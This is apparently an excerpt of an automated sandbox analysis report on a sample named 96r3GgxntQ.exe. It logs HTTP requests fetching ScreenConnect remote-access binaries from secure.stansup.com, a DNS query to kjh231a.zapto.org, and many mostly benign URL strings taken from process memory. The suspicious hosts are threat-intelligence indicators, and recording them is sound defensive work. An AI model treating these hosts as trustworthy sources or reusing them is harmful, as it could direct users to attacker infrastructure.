                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: secure.stansup.com
                  Source: global trafficDNS traffic detected: DNS query: kjh231a.zapto.org
                  Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 00000008.00000002.2609938156.000001CEA36C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507259190.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2609998357.000001CEA36DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1389610111.000001CEA3153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000008.00000002.2609739077.000001CEA36AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbA
                  Source: svchost.exe, 00000008.00000002.2607941732.000001CEA28B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: svchost.exe, 00000007.00000002.2610850094.0000025CF7A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000002.00000002.2256114237.00000276A41A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: dfsvc.exe, 00000002.00000002.2256340310.00000276A41D4000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: svchost.exe, 00000008.00000003.1542897371.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2
                  Source: svchost.exe, 00000008.00000003.1542897371.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-
                  Source: svchost.exe, 00000008.00000003.1476705098.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1454980139.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1542897371.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507366412.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514111409.000001CEA3179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507340782.000001CEA310F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524365290.000001CEA3174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1476303270.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492473258.000001CEA3174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455119455.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608495004.000001CEA3100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477152749.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507228196.000001CEA3107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455865428.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455646765.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492473258.000001CEA3174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
                  Source: svchost.exe, 00000008.00000003.1413548396.000001CEA3153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxmlns:
                  Source: svchost.exe, 00000008.00000003.1542897371.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.x
                  Source: svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1476303270.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492473258.000001CEA3174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455119455.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608495004.000001CEA3100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477152749.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507228196.000001CEA3107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455865428.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455646765.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492113188.000001CEA315C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000008.00000003.1476705098.000001CEA3129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAA
                  Source: svchost.exe, 00000008.00000003.1476705098.000001CEA3129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                  Source: svchost.exe, 00000008.00000003.1514111409.000001CEA3179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492473258.000001CEA3174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                  Source: svchost.exe, 00000008.00000003.1413548396.000001CEA3153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdst=
                  Source: svchost.exe, 00000008.00000003.1476705098.000001CEA3129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdx
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: 96r3GgxntQ.exe, 00000000.00000002.1554370443.000000000082A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digi
                  Source: dfsvc.exe, 00000002.00000002.2255837190.00000276A4168000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2252252771.00000276A2AD0000.00000004.00000020.00020000.00000000.sdmp, C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.2.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7Nfjgt
                  Source: dfsvc.exe, 00000002.00000002.2255109101.00000276A4125000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000002.00000002.2255528348.00000276A415C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: svchost.exe, 00000008.00000003.1507228196.000001CEA3107000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/20
                  Source: svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492090712.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492090712.000001CEA310E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492090712.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507259190.000001CEA312F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507259190.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2609998357.000001CEA36DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee0
                  Source: svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee1
                  Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesue
                  Source: svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue
                  Source: svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: dfsvc.exe, 00000002.00000002.2237912718.0000027689FE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001405000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.stansup.com
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                  Source: dfsvc.exe, 00000002.00000002.2256074247.00000276A419F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w23.org/2001/X3hema-instanc:v
                  Source: 96r3GgxntQ.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                  Source: dfsvc.exe, 00000002.00000002.2256734540.00000276A4251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.=U
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A512000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1745338793.000000001ACF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A512000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A535000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A59C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=806013
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
